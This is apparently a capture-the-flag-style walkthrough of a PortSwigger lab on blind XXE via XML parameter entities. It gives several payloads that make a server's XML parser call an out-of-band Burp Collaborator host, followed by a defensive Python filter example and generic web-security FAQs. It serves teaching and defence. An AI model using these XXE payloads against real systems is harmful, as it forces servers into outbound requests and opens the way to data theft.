
Blind XXE with out-of-band interaction via XML parameter entities

Information

Hello guys, today in Blind XXE with out-of-band interaction via XML parameter entities we will solve the 4th lab of PortSwigger Web Security. As you know, we are exploring XML or XXE vulnerabilities in a series and solving their practical labs.

In today’s article, we will solve the lab named “Blind XXE with out-of-band interaction via XML parameter entities” in a step-by-step manner.

Lab Description Of Blind XXE with out-of-band interaction via XML parameter entities


In this lab, there is a “check stock” feature that parses XML input. The application does not display any unexpected values in its response, and it blocks requests that contain regular external entities. To solve this lab, we need to use a parameter entity to make the XML parser issue a DNS lookup request, and then check the result in Burp Suite Collaborator.

Lab Solution

First, access the lab. After accessing the lab, view any product. Once you view the product, you will find a stock check button there. Click on the stock check button and intercept it in Burp Suite.

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"%xxe;> ]>

Now, take the given external entity definition and insert it between the XML declaration and the stockCheck element, and forward the request.


<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>


<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]> %xxe;

I have used 3 payloads above, out of which one will definitely execute.

Now, we need to check Burp Collaborator to see if any DNS and HTTP requests have been received there or not.

As you can see, we have received requests in Burp Collaborator. Now, let’s check if our lab has been successfully solved or not.


We have successfully solved the lab on Blind XXE with out-of-band interaction via XML parameter entities.

To continue studying, check out the next lab, Exploiting Blind XXE To Exfiltrate Data Using A Malicious External DTD. Complete the current lab before moving on to the next one. Good luck!
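
A defender's view of why the filter in this lab falls short, as an added example that is not part of the original walkthrough or of the lab's own code: it uses Python's expat bindings to list the DTD constructs in a request body without resolving them, and compares a filter that only blocks regular (general) external entities with one that rejects any DTD. The two filter functions, the request bodies and the placeholder.invalid host are assumptions constructed for illustration.

```python
import xml.parsers.expat as expat

# Constructed request bodies; placeholder.invalid stands in for any external host.
HEAD = b'<?xml version="1.0" encoding="UTF-8"?>'
BODY = b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
PLAIN = HEAD + BODY
GENERAL = (HEAD + b'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM '
           b'"http://placeholder.invalid/">]>' + BODY)
PARAM = (HEAD + b'<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM '
         b'"http://placeholder.invalid/"> %xxe; ]>' + BODY)


def dtd_findings(body):
    """List every DTD construct in body. Nothing is fetched or expanded."""
    findings = []
    parser = expat.ParserCreate()
    # expat only reports external entities to a handler; keep parameter
    # entity processing switched off explicitly as well.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        scope = "external" if system_id is not None else "internal"
        kind = "parameter" if is_param else "general"
        findings.append((f"{scope}-{kind}-entity", name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        findings.append(("malformed", str(exc), None))
    return findings


def weak_filter_allows(body):
    """Assumed model of the lab's filter: only general external entities are blocked."""
    return all(f[0] != "external-general-entity" for f in dtd_findings(body))


def strict_filter_allows(body):
    """Hardened rule: a stock-check request has no reason to carry any DTD."""
    return dtd_findings(body) == []


if __name__ == "__main__":
    for label, body in (("plain", PLAIN), ("general", GENERAL), ("param", PARAM)):
        print(label, weak_filter_allows(body), strict_filter_allows(body), dtd_findings(body))
```

The weak filter lets the parameter-entity body through while the strict one rejects it; in production the same rule is normally enforced by disabling DTD processing in the XML parser itself.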

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always good practice to use an up-to-date browser that receives timely updates. Keep your browser plugins up to date, avoid malicious websites and links, enable two-factor authentication, and watch out for clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
